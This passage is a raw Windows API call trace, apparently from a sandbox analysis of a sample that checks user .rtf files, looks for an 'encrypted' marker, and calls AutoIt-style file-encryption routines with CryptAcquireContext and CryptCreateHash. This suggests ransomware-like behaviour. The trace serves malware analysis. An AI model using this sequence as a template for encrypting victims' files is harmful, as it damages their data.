[0035.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0035.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce08 [0035.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88ce08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0035.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0035.973] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0035.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0035.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0035.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0035.973] CloseHandle (hObject=0x140) returned 1 [0035.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0035.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0035.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0035.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.973] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0035.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0035.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0035.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0035.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0035.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0035.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0035.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0035.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0035.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0035.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0035.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0035.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0035.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0035.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.974] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0035.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0035.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0035.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.974] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.974] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0035.974] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.974] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0035.974] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0035.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.974] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.974] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.975] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.975] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd295210, ftCreationTime.dwHighDateTime=0x1d5bf96, ftLastAccessTime.dwLowDateTime=0x57e65cb0, ftLastAccessTime.dwHighDateTime=0x1d5bdb6, ftLastWriteTime.dwLowDateTime=0x57e65cb0, ftLastWriteTime.dwHighDateTime=0x1d5bdb6, nFileSizeHigh=0x0, nFileSizeLow=0x1276b, dwReserved0=0x0, dwReserved1=0x777648, cFileName="XjUfY.rtf", cAlternateFileName="")) returned 0x7c20c0 [0035.975] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0035.975] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd295210, ftCreationTime.dwHighDateTime=0x1d5bf96, ftLastAccessTime.dwLowDateTime=0x57e65cb0, ftLastAccessTime.dwHighDateTime=0x1d5bdb6, ftLastWriteTime.dwLowDateTime=0x57e65cb0, ftLastWriteTime.dwHighDateTime=0x1d5bdb6, nFileSizeHigh=0x0, nFileSizeLow=0x1276b, dwReserved0=0x0, dwReserved1=0x777648, cFileName="XjUfY.rtf", cAlternateFileName="")) returned 0x7c20c0 [0035.975] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0035.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="007meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSo66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="So66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XjUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jUfY.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.977] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0035.977] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0035.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.977] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd295210, ftCreationTime.dwHighDateTime=0x1d5bf96, ftLastAccessTime.dwLowDateTime=0x57e65cb0, ftLastAccessTime.dwHighDateTime=0x1d5bdb6, ftLastWriteTime.dwLowDateTime=0x57e65cb0, ftLastWriteTime.dwHighDateTime=0x1d5bdb6, nFileSizeHigh=0x0, nFileSizeLow=0x1276b, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="XjUfY.rtf", cAlternateFileName="")) returned 0x7c2100 [0035.978] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0035.978] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.978] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.978] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0035.978] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0035.978] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.978] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.978] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0035.979] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0035.979] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.979] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0035.979] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.979] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.979] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.979] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.979] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.979] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.979] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0035.980] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0035.980] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 